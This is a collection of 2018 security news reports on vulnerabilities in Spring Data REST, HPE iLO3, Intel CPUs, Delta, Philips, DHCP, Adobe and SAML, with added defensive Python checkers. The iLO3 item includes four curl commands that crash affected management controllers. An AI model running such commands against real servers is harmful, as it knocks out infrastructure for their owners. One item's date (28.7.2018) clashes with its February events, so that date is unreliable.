“This vulnerability in Spring Data REST is unfortunately very easy to exploit. As it is common for RESTful APIs to be publicly accessible, it potentially allows bad actors to easily gain control over production servers and obtain sensitive user data.” explained Man Yue Mo, lgtm.com security researcher at Semmle who discovered the issue.

The affected Spring products and components are:

Spring Data REST components, versions prior to 2.5.12, 2.6.7, 3.0RC3
(Maven artifacts: spring-data-rest-core, spring-data-rest-webmvc, spring-data-rest-distribution, spring-data-rest-hal-browser)
Spring Boot, versions prior to 2.0.0M4
(when using the included Spring Data REST component: spring-boot-starter-data-rest)
Spring Data, versions prior to Kay-RC3
Hurry up and upgrade the above components to the latest versions.
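To turn the affected-version list into a check, here is an added example (not Pivotal’s or lgtm.com’s code) that parses Spring-style version strings, including the `M` and `RC` qualifiers, and compares each declared Maven dependency with the fixed versions the advisory lists. The fixed-version table and artifact ids come from the list above; the group ids `org.springframework.data` and `org.springframework.boot` are the real Maven coordinates; the dependency list is constructed sample input, and treating release lines older than 2.5.12 as never having received a fix is an assumption made here about what “prior to” means.

```python
"""Check declared Maven dependencies against the Spring Data REST versions the
advisory lists as fixed for CVE-2017-8046. Added example for this article, not
Pivotal's or lgtm.com's code; the dependency list is constructed sample input."""
import re

# Fixed versions as stated in the advisory; anything on the same release line
# below these, or on an older line with no fix, is treated as affected
# (assumption made here).
FIXED = {
    "spring-data-rest": ("2.5.12", "2.6.7", "3.0RC3"),
    "spring-boot-starter-data-rest": ("2.0.0M4",),
}
# Artifact ids named in the advisory, mapped to the FIXED entry that covers them.
ARTIFACTS = {
    "spring-data-rest-core": "spring-data-rest",
    "spring-data-rest-webmvc": "spring-data-rest",
    "spring-data-rest-distribution": "spring-data-rest",
    "spring-data-rest-hal-browser": "spring-data-rest",
    "spring-boot-starter-data-rest": "spring-boot-starter-data-rest",
}
QUALIFIER_RANK = {"M": 0, "RC": 1}   # milestone < release candidate < final release
RELEASE_RANK = 2
# Accepts 2.6.6.RELEASE, 2.6.6, 3.0.0.RC2, 2.0.0.M4 and the advisory's shorthand 3.0RC3.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?\.?(?:(M|RC)(\d+)|RELEASE)?$")


def parse_spring_version(text):
    """'2.6.6.RELEASE' -> (2, 6, 6, 2, 0); '3.0.0.RC2' -> (3, 0, 0, 1, 2);
    '3.0RC3' -> (3, 0, 0, 1, 3). Tuples compare in the right order."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError("unrecognised Spring version: %r" % text)
    major, minor, patch, qual, qnum = m.groups()
    rank = QUALIFIER_RANK[qual] if qual else RELEASE_RANK
    return (int(major), int(minor), int(patch or 0), rank, int(qnum or 0))


def is_affected(artifact_id, version):
    """True when the artifact is one the advisory names and the version is
    below the fix for its release line."""
    family = ARTIFACTS.get(artifact_id)
    if family is None:
        return False                   # not one of the advisory's artifacts
    v = parse_spring_version(version)
    fixed = sorted(parse_spring_version(f) for f in FIXED[family])
    same_line = [f for f in fixed if f[:2] == v[:2]]
    if same_line:
        return v < same_line[0]        # e.g. 2.6.6.RELEASE < 2.6.7
    # No fix on this line: older lines never got one, newer lines ship fixed.
    return v < fixed[0]


def scan_dependencies(deps):
    """deps: iterable of (groupId, artifactId, version). Returns the affected ones."""
    return [d for d in deps if is_affected(d[1], d[2])]


SAMPLE_DEPS = [  # constructed sample input
    ("org.springframework.data", "spring-data-rest-webmvc", "2.6.6.RELEASE"),
    ("org.springframework.data", "spring-data-rest-core", "3.0.0.RC2"),
    ("org.springframework.boot", "spring-boot-starter-data-rest", "2.0.0.RC1"),
    ("org.springframework.data", "spring-data-jpa", "1.11.3.RELEASE"),
]

if __name__ == "__main__":
    for dep in scan_dependencies(SAMPLE_DEPS):
        print("AFFECTED: %s:%s:%s" % dep)
```

Because Spring Boot pulls Spring Data REST in transitively, feed the scanner the resolved versions from `mvn dependency:tree` rather than only what `pom.xml` declares.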


Microsoft released Windows Updates that include Intel’s Spectre microcode patches
4.3.2018 securityaffairs
Vulnerebility

Microsoft announced this week the release of the microcode updates to address the Spectre vulnerability.
Last week Intel released microcode to address the CVE-2017-5715 Spectre vulnerability for many of its chips; let’s hope that this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited from within a process by code it runs: for example, malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost every platform, including systems running on Broadwell and Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

Microsoft is going to deliver microcode updates for Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core) running on devices with 6th Generation Intel Core (Skylake) processors.

“This update is a standalone update available through the Microsoft Update Catalog and targeted for Windows 10 version 1709 (Fall Creators Update) & Windows Server version 1709 (Server Core).” read the advisory published by Microsoft. “This update also includes Intel microcode updates that were already released for these Operating Systems at the time of Release To Manufacturing (RTM). We will offer additional microcode updates from Intel thru this KB Article for these Operating Systems as they become available to Microsoft.”

Microsoft confirmed that almost all Windows devices now have compatible security products installed and that all problems with the patches have been fixed.

“We have also been working closely with our anti-virus (AV) partners on compatibility with Windows updates, resulting in the vast majority of Windows devices now having compatible AV software installed.” wrote John Cable, Director of Program Management, Windows Servicing and Delivery

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility.”


A flaw in HP Remote Management hardware Integrated Lights-Out 3 exposes servers to DoS
4.3.2018 securityaffairs
Vulnerebility

Hewlett Packard Enterprise issued a security patch to address a vulnerability (CVE-2017-8987) in HP remote management hardware Integrated Lights-Out 3.
Hewlett Packard Enterprise has issued a security patch to address a vulnerability (CVE-2017-8987) in its remote management hardware Integrated Lights-Out 3, which equips the family of HP ProLiant servers.

The Hewlett-Packard iLO is composed of a physical card with a separate network connection that is used for the remote management of the device.

HP Remote Management

The vulnerability could be exploited by a remote attacker to mount a denial of service attack that could cause severe problems to data centers under some conditions.

The vulnerability in the HP remote management hardware Integrated Lights-Out 3 was discovered by researchers at Rapid7 in September; the issue is rated “high severity” and has received a CVSS base score of 8.6.

“This post describes CVE-2017-8987, an unauthenticated remote Denial of Service vulnerability in HPE iLO3 firmware version 1.88. This vulnerability can be exploited by several HTTP methods; once triggered, it lasts for approximately 10 minutes until the watchdog service performs a restart of the iLO3 device. CVE-2017-8987 is categorized as CWE-400 (Resource Exhaustion) and has a CVSSv3 base score of 8.6.” states Rapid7.

Once an attacker has compromised a network, they can lock an admin out of the interface needed to restore operations, causing severe problems to a data center.

“Several HTTP request methods cause iLO3 devices running firmware v1.88 to stop responding in several ways for 10 minutes:

SSH: open sessions will become unresponsive; new SSH sessions will not be established
Web portal: users cannot log in to the web portal; the login page will not successfully load
” continues Rapid 7.

HPE publicly disclosed the vulnerability on Feb. 22.

“A security vulnerability in HPE Integrated Lights-Out 3 (iLO 3) allows remote Denial of Service (DoS).” reads the security advisory published by HPE.

“HPE has provided the following instructions to resolve the vulnerability in HPE Integrated Lights-Out 3 (iLO 3) version 1.88: Please upgrade to HPE Integrated Lights-Out 3 (iLO 3) 1.89 which is available on HPE Support Center:

https://support.hpe.com/hpesc/public/home“

HPE said that the affected version is the v1.88 firmware for HPE Integrated Lights-Out 3 (iLO3); newer versions of the firmware (1.8, 1.82, 1.85, and 1.87), along with firmware for iLO4 (v2.55), are not impacted.

According to Rapid7, iLO5 devices were not tested. The experts also observed that requests using the following four methods will also trigger the denial of service:

curl -X OPTIONS hp-ilo-3.testing.your-org.com
curl -X PROPFIND hp-ilo-3.testing.your-org.com
curl -X PUT hp-ilo-3.testing.your-org.com
curl -X TRACE hp-ilo-3.testing.your-org.com
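On the defensive side, the four methods above are easy to watch for at a reverse proxy or IDS in front of the management network, and the firmware numbers in the bulletin make an inventory check straightforward. The block below is an added example for this article, not Rapid7’s or HPE’s code: it assumes Apache-style access logs with the virtual host (`%v`) as the first field so the target iLO is visible, reuses the hostname from the curl lines above alongside constructed neighbours, and the log lines and inventory entries are constructed sample data.

```python
"""Spot the HTTP methods that Rapid7 reports knock iLO3 v1.88 offline, and flag
inventory entries still on the affected firmware. Added example for this
article, not Rapid7's or HPE's code; log lines and inventory are constructed
sample data. Assumed log format: Apache-style access log with the virtual host
(%v) as the first field, then client address, ident, user, timestamp, request,
status and size."""
import re
from collections import Counter

# The four methods Rapid7 listed as triggering the outage (see the curl lines above).
DOS_METHODS = {"OPTIONS", "PROPFIND", "PUT", "TRACE"}
# Affected and fixed firmware for iLO3 per the HPE bulletin quoted above.
AFFECTED_FIRMWARE = {"iLO3": {"1.88"}}
FIXED_FIRMWARE = {"iLO3": "1.89"}

LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_log_line(line):
    """Return the fields of one access-log record, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_dos_probes(lines, management_hosts):
    """Count (source, iLO host) pairs issuing the risky methods at hosts in the
    management set. Unparseable lines are skipped rather than raising, so a
    stray line in the feed cannot stall the detector."""
    hits = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["host"] not in management_hosts:
            continue
        if rec["method"] in DOS_METHODS:
            hits[(rec["src"], rec["host"])] += 1
    return hits


def firmware_needing_update(inventory):
    """inventory: iterable of (host, generation, firmware). Returns
    [(host, current, required)] for entries on an affected release."""
    out = []
    for host, gen, fw in inventory:
        if fw in AFFECTED_FIRMWARE.get(gen, set()):
            out.append((host, fw, FIXED_FIRMWARE[gen]))
    return out


SAMPLE_LOG = [  # constructed sample records
    'hp-ilo-3.testing.your-org.com 10.0.0.9 - - [01/Mar/2018:10:00:01 +0000] "OPTIONS / HTTP/1.1" 200 0',
    'hp-ilo-3.testing.your-org.com 10.0.0.9 - - [01/Mar/2018:10:00:02 +0000] "PROPFIND / HTTP/1.1" 200 0',
    'hp-ilo-3.testing.your-org.com 10.0.0.21 - - [01/Mar/2018:10:00:05 +0000] "GET /login.html HTTP/1.1" 200 4521',
    'hp-ilo-3.testing.your-org.com 10.0.0.9 - - [01/Mar/2018:10:00:07 +0000] "TRACE / HTTP/1.1" 200 0',
    'www.testing.your-org.com 10.0.0.9 - - [01/Mar/2018:10:00:09 +0000] "OPTIONS / HTTP/1.1" 200 0',
    'this line is not an access log record',
]
MANAGEMENT_HOSTS = {"hp-ilo-3.testing.your-org.com"}
SAMPLE_INVENTORY = [  # constructed; hostnames other than the first are made up
    ("hp-ilo-3.testing.your-org.com", "iLO3", "1.88"),
    ("hp-ilo-3b.testing.your-org.com", "iLO3", "1.89"),
    ("hp-ilo-4a.testing.your-org.com", "iLO4", "2.55"),
]

if __name__ == "__main__":
    for (src, host), n in find_dos_probes(SAMPLE_LOG, MANAGEMENT_HOSTS).items():
        print("%s sent %d risky requests to %s" % (src, n, host))
    for host, current, required in firmware_needing_update(SAMPLE_INVENTORY):
        print("%s runs %s, upgrade to %s" % (host, current, required))
```

Only requests aimed at hosts in the management set count, so the same method against an ordinary web server is ignored; an ordinary GET of the login page on the iLO host is likewise left alone.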

Below is the disclosure timeline:

Sept 2017: Issue discovered
Thurs, Oct 19, 2017: Vendor released v1.89 update to iLO3, which addresses CVE-2017-8987
Mon, Nov 6, 2017: Vendor notified; vendor assigned PSRT110615 to this vulnerability
Wed, Nov 15, 2017: Additional details sent to vendor
Wed, Jan 10, 2018: Disclosed to CERT/CC
Wed, Jan 31, 2018: Vendor reported that v1.89 is not vulnerable to R7-2017-27; Rapid7 confirmed this finding.
Thurs, Feb 22, 2018: Public disclosure; vendor published security bulletin and assigned CVE-2017-8987
Thurs, Mar 1, 2018: Rapid7 published this post


Delta Patches Vulnerabilities in HMI, PLC Products
3.3.2018 securityweek
Vulnerebility

Taiwan-based Delta Electronics has patched several vulnerabilities in two of the company’s industrial automation products, including flaws that can be exploited for remote code execution.

A researcher who uses the online moniker “Axt” informed Delta via Trend Micro’s Zero Day Initiative (ZDI) and ICS-CERT that its WPLSoft product, a programming software for programmable logic controllers (PLCs), is affected by several types of vulnerabilities.

ICS-CERT’s advisory describes three types of flaws that can allow arbitrary code execution in the context of the current process or denial-of-service (DoS) attacks, specifically stack-based buffer overflow, heap-based buffer overflow, and out-of-bounds write issues. The security holes have been rated high severity and they are tracked as CVE-2018-7494, CVE-2018-7507 and CVE-2018-7509.

ZDI has published a total of nine advisories, one for each variation of these flaws. According to the company, the vulnerabilities are related to how the application parses .dvp files and they can be exploited by getting the targeted user to open a specially crafted file or webpage.

ZDI said it reported the security holes to Delta via ICS-CERT in February 2017. The company’s advisories suggest that the vendor attempted to release some patches last summer, but they did not properly fix the vulnerabilities. ZDI published its advisories in August 2017 with a “0Day” status.

ICS-CERT reported this week that the vulnerabilities were patched by Delta with the release of WPLSoft V2.46.0, which according to the vendor’s site was made available on February 2.

A separate advisory published this week by ICS-CERT describes a medium severity vulnerability found by researcher Ghirmay Desta in Delta’s DOPSoft human-machine interface (HMI) product.

The flaw, a stack-based buffer overflow, is related to the processing of .dop or .dpb files, and it can allow remote code execution. The issue affects DOPSoft 4.00.01 and prior, and it was patched with the release of version 4.00.04 on March 1.

This vulnerability was also reported to Delta via ZDI, but the company has yet to publish advisories. ZDI’s website shows a total of 17 upcoming advisories describing vulnerabilities found by Desta in the DOPSoft product in October 2017. Last year, the expert also found weaknesses in Delta’s PMSoft, a development tool for motion controllers.

ZDI was also recently informed by an anonymous researcher of four high severity flaws in an unnamed Delta product.

It’s not uncommon for ICS vendors to take hundreds of days to patch vulnerabilities. A report published last year by ZDI showed that the average patching time for SCADA flaws had been 150 days.


Windows Updates Deliver Intel's Spectre Microcode Patches
2.3.2018 securityweek 
Vulnerebility

Microsoft announced on Thursday that Windows users will receive the microcode updates released by Intel to patch the notorious Spectre vulnerability.

Meltdown and Spectre attacks allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to a flaw tracked as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be addressed with software updates, but Spectre Variant 2 requires microcode patches.

Microsoft has provided users the necessary software updates and it has now started delivering microcode patches as well.

After the first round of Spectre microcode patches from Intel caused more frequent reboots and other instability problems, Intel started releasing new updates. The first patches were for Skylake, then for Kaby Lake and Coffee Lake, and this week for Haswell and Broadwell processors.

Intel has provided the microcode updates to device manufacturers, which are expected to make them available to customers once they have been tested.

For the time being, Microsoft will deliver Intel’s microcode updates to devices with 6th Generation Intel Core (Skylake) processors if they are running Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core).

“We will offer additional microcode updates from Intel as they become available to Microsoft. We will continue to work with chipset and device makers as they offer more vulnerability mitigations,” said John Cable, director of Program Management, Windows Servicing and Delivery.

When it started releasing software mitigations for Spectre and Meltdown, Microsoft warned that some users may not receive the updates due to antivirus compatibility issues. Cable said a vast majority of Windows devices now have compatible security products installed so they should not experience any problems in getting the patches.

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility,” Cable explained.

After news broke that Intel’s first round of microcode updates caused instability issues, Microsoft released an update that allowed Windows users to disable the problematic Spectre Variant 2 mitigation.


Philips Working on Patches for 35 Flaws in Healthcare Product
2.3.2018 securityweek 
Vulnerebility

Philips has informed customers that it’s working on patches for dozens of vulnerabilities affecting the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.

According to Philips, versions 7.0.x and 8.0.x of the IntelliSpace Portal are affected by issues related to insecure Windows service permissions, legacy encryption, and remote desktop access functionality. A total of 35 CVE identifiers are associated with the vulnerabilities.

An advisory published by ICS-CERT describes the security holes as input validation flaws that allow remote code execution or denial-of-service (DoS) attacks, information exposure issues that allow unauthorized access to sensitive data, access control weaknesses that can be used for privilege escalation or code execution, local code execution and privilege escalation flaws, a code execution vulnerability that exists due to leftover debugging code, and multiple cryptographic issues.

While some of these vulnerabilities appear to be specific to Philips’ product, many affect third-party components. For example, there are several remote code execution, information disclosure and DoS flaws related to Windows SMB, including the EternalBlue flaw exploited in the WannaCry ransomware attack.

Other flaws affect the Microsoft Remote Desktop Protocol (RDP) and Microsoft Office. The crypto-related weaknesses include POODLE, BEAST and other vulnerabilities disclosed in the past years, including one from 2004.

While exploits are publicly available for many of these vulnerabilities, they don’t specifically target Philips products, and the vendor claims it’s not aware of any attacks.

Philips will release patches in the coming months. The company says it’s also currently testing operating system updates, which cannot be installed without ensuring that they don’t impact the stability of the product. Until patches become available, customers have been provided a series of workarounds.

In January, Philips informed customers of an authentication issue affecting its IntelliSpace Cardiovascular (ISCV) cardiac image and information management system.

The company learned from a customer that when the ISCV system is used with an Electronic Medical Record (EMR) in Kiosk mode and configured with Windows authentication, users may not be properly logged out once they are done using the software.

The flaw allows a malicious actor that gains access to the system after it has been used by a legitimate EMR user to log in with that user’s credentials and obtain or modify sensitive information.

Philips said the security hole will be addressed with the release of version 3.1.0. In the meantime, users have been advised to close the browser after accessing the system. Changing the configuration so that Windows authentication is not used also addresses the problem.


Bugcrowd Raises $26 Million to Expand Vulnerability Hunting Business
2.3.2018 securityweek 
Vulnerebility

Crowdsourced security testing company Bugcrowd announced today that it has closed $26 million in a Series C funding round led by Triangle Peak Partners.

The new funding brings the total amount raised by the company to $50 million, including $15 million raised in a Series B funding round in 2016.

The company’s flagship “Crowdcontrol” offering is a software-as-a-service platform that allows organizations to run their own customized bug bounty programs to uncover and resolve security vulnerabilities in their products.

The new funding will be used to support product innovation and program management, the company said.

Bugcrowd currently operates the rewards programs of more than 70 different companies, including security firms BitDefender, Centrify, NETGEAR, 1Password, Okta, Cylance and LastPass. Industry customers include MasterClass, Fiat Chrysler, Square, Fitbit, Mastercard, Tesla and Western Union. A recently announced Samsung Electronics Mobile Security program rewards security researchers up to $200,000 per vulnerability, depending on its severity.

Existing investors Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Stanford participated in the Series C round, along with new investors Hostplus and First State Super.


Remotely Exploitable Flaws Patched in DHCP
2.3.2018 securityweek 
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.


Emerson Patches Severe Flaw in ControlWave Controllers
1.3.2018 securityweek
Vulnerebility

Automation solutions provider Emerson has patched a potentially serious denial-of-service (DoS) vulnerability in its ControlWave Micro Process Automation Controller product.

ControlWave Micro Process Automation Controller is a hybrid remote terminal unit (RTU)/programmable logic controller (PLC) used around the world, particularly in the energy, and water and wastewater systems sectors.

According to an advisory published this week by ICS-CERT, this Emerson product is affected by a high severity stack-based buffer overflow vulnerability that can be exploited to force the device to enter “halt mode” by sending specially crafted packets on port 20547.

“Exploitation may possibly cause a halt of Ethernet functionality, requiring a cold start to restore the system as well as communications related to ControlWave Designer access. This can possibly result in a loss of system availability and disruption in communications with other connected devices,” ICS-CERT said in its advisory.

The flaw, tracked as CVE-2018-5452, affects ControlWave Micro controllers running version 05.78.00 and prior of the firmware. Emerson patched the vulnerability with the release of version 05.79.00.

The security hole was reported to Emerson by Nozomi Networks, a company that specializes in cybersecurity and visibility solutions for industrial control systems (ICS). The firm, which recently raised $15 million in a Series B funding round, said it did not take long to find the flaw using a process it developed for testing ICS devices.

Moreno Carullo, co-founder and CTO of Nozomi, told SecurityWeek that the vulnerability can be exploited remotely over the Internet against devices that have port 20547 open. A Shodan search conducted by the company showed 163 potentially vulnerable devices, mainly in the United States, Canada and Mexico.

Carullo said the vulnerability was reported to Emerson in October 2017 and it was patched after roughly two months, which he described as “relatively fast compared to others.”


Siemens Releases BIOS Updates to Patch Intel Chip Flaws
28.2.2018 securityweek
Vulnerebility

Siemens has released BIOS updates for several of its industrial devices to patch vulnerabilities discovered recently in Intel chips, including Meltdown, Spectre and flaws affecting Intel’s Management Engine technology.

Following the disclosure of the Meltdown and Spectre attack methods, industrial control systems (ICS) manufacturers immediately started analyzing the impact of the flaws on their products. Advisories have been published by companies such as Siemens, Rockwell Automation, Schneider Electric, ABB, and Pepperl+Fuchs.

Siemens has determined that the security holes expose many of its product lines to attacks, including RUGGEDCOM, SIMATIC, SIMOTION, SINEMA, and SINUMERIK.

The company informed customers recently that it has started releasing BIOS updates for some of its impacted products, including SIMATIC industrial PCs, SIMATIC field PG rugged laptops, SIMATIC industrial tablet PCs (ITP), and SINUMERIK panel control units (PCU). In addition to firmware patches, users have been advised to install operating system updates, which should mitigate the Meltdown flaw and one variant of Spectre.

The BIOS updates released by the company for the aforementioned SIMATIC and SINUMERIK devices also patch several vulnerabilities discovered last year by researchers in Intel’s Management Engine (ME), Server Platform Services (SPS), and Trusted Execution Engine (TXE) technologies.

The flaws impacting these Intel products can be exploited – in most cases locally, but at least one bug is remotely exploitable – for arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.

The firmware updates from Siemens also fix a vulnerability affecting the Trusted Platform Module (TPM) in chips made by German semiconductor manufacturer Infineon.

The flaw, CVE-2017-15361, is related to the RSA library in TPM and it could allow a remote attacker who knows the public key to obtain the private RSA key. The security hole affects the products of several major tech firms, including Microsoft, Google, HP, Lenovo and Fujitsu.

Siemens has published separate advisories to inform users about the availability of patches for Meltdown/Spectre, Intel ME, and Infineon TPM vulnerabilities. ICS-CERT has so far published an advisory only for the Infineon issue.


Talos experts shared details of a remote code execution flaw in Adobe Acrobat Reader DC
28.2.2018 securityweek
Vulnerebility

Security experts at Cisco Talos disclosed details of a remote code execution flaw that affects Adobe Acrobat Reader DC versions 2018.009.20050 and 2017.011.30070 and earlier.
Security experts at Cisco Talos shared details of a remote code execution vulnerability tracked as CVE-2018-4901, that affects Adobe Acrobat Reader DC.

A remote attacker can exploit the vulnerability by tricking the victim into opening a malicious file or visiting a specially crafted webpage.

The flaw affects Adobe Acrobat Reader versions 2018.009.20050 and 2017.011.30070 and earlier. The vulnerability was disclosed on Dec. 7 and Adobe addressed it a few days ago, on February 13.

“Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.” reads the analysis published by the Talos team.

Adobe classified the flaw as “priority 2”, which corresponds to an “important” rating and means there is an “elevated risk” of exploitation. The good news is that there are currently no known exploits in the wild.

The researchers explained that malicious JavaScript embedded in a PDF file can cause the document ID field to be used in an unauthorized, unbounded copy operation, triggering a stack-based buffer overflow when the specially crafted PDF document is opened.

“A specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader,” continues Talos.

Researchers at Talos also released Snort rules 45102-3 that could be used by administrators to detect exploitation attempts.


Intel Releases Spectre Patches for Broadwell, Haswell CPUs
28.2.2018 securityweek 
Vulnerebility

Intel has released new firmware updates for its Broadwell and Haswell processors to address the Spectre vulnerability.

After the first round of Spectre patches released by the company caused more frequent reboots and other instability problems, Intel started working on new microcode updates.

The company first released new firmware updates for its Skylake processors, and last week it announced the availability of patches for several other CPUs, including Kaby Lake and Coffee Lake.

This week, the company updated the list of available firmware patches to state that the fixes for Haswell and Broadwell processors are also ready for use in production environments.

As of February 28, patches that can be deployed in production environments are available for the following products: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broadwell (except Server EX), Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Haswell (except Server EX), Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches have been provided to OEMs for validation for Gladden, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The microcode updates for Broadwell and Haswell Server EX processors, specifically the Xeon E7v4 and E7v3 product families, are also in beta phase.

As for the remaining CPUs, updates are either in pre-beta or planning phase, but pre-mitigation microcode updates are available for many of these products.

The patches will be delivered as OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but a majority of firms decided to halt the updates due to instability issues. Some vendors have now resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel and AMD claim they are working on processors that will have built-in protections against these types of exploits.

Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.


Recently patched CVE-2018-4878 Adobe Flash Player flaw now exploited by cybercriminals
28.7.2018 securityaffairs
Vulnerebility

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.
Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was being used by the North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability has been exploited by other threat actors in the wild, as confirmed by Morphisec. The company spotted a campaign on February 22 in which the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that exploited CVE-2018-4878 in a malspam campaign. The researchers also highlighted that, unlike the original exploit, this one did not have a 64-bit version.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz. Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

If the user enables the editing mode, the CVE-2018-4878 Adobe vulnerability is exploited and the Windows command prompt is executed. The associated cmd[.]exe file is then injected with malicious shellcode that connects to the attacker’s domain.


The URLs included in the emails were generated with Google’s URL shortening service, which allowed the researchers to determine the number of victims that clicked them. According to Morphisec, each of the different links used in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created.


“On February 22, 2018, Morphisec Labs spotted several malicious word documents exploiting the latest Flash vulnerability CVE-2018-4878 in the wild in a massive malspam campaign.” states the analysis published by Morphisec.

“After downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a cmd[.]exe which is later remotely injected with a malicious shellcode that connects back to the malicious domain.”

The shellcode then downloads a DLL from the same domain, which is executed using the Microsoft Register Server utility to bypass whitelisting solutions.

According to the experts, only a limited number of security solutions flag the bait documents as malicious.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible. With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.” concluded Morphisec.


Widespread Vulnerability Found in Single-Sign-On Products
27.7.2018 securityweek
Vulnerebility

A behavioral quirk in SAML libraries has left many single-sign-on (SSO) implementations vulnerable to abuse. It allows an attacker that has gained any authenticated access to trick the system into granting further access as a different user without knowledge of that user's password.

This could be used by an attacker who has compromised a low level limited access account to acquire access to third-party cloud services -- or it could be used by a malicious insider seeking access to reserved network areas (such as the payroll databases, or HR records).

The vulnerability was discovered by the research team of Duo Security, itself an SSO provider; and is described in a blog posted today. It affects many of the leading SSO providers, and probably affects the majority of proprietary company SSO developments.

Duo has confirmed the flaw in OneLogin - python-saml (CVE-2017-11427); OneLogin - ruby-saml (CVE-2017-11428); Clever - saml2-js (CVE-2017-11429); OmniAuth-SAML (CVE-2017-11430); Shibboleth (CVE-2018-0489); and Duo Network Gateway (CVE-2018-7340).

Security Assertion Markup Language (SAML) is the underlying protocol used by most SSO implementations. It is what allows authentication to be passed between a company's identity store and, for example, a third-party service. Typically, a user will log onto the identity store. This contains the credentials that will allow the same user to access other services.

SAML is used to pass authentication, via the browser, from the identity provider to the third-party service, granting access. The flaw lies in how authentication is encoded by SAML in the provider's 'response'.

The SAML authentication response contains two primary elements: the assertion and the signature. The assertion element says this NameID is authenticated. The signature element is designed to prevent the authenticated user NameID being changed at any point between the identity provider and the service being accessed. "If the attacker can modify the 'NameID' without invalidating the signature, that would be bad," suggest the Duo researchers; and then proceed to explain how it can be done.

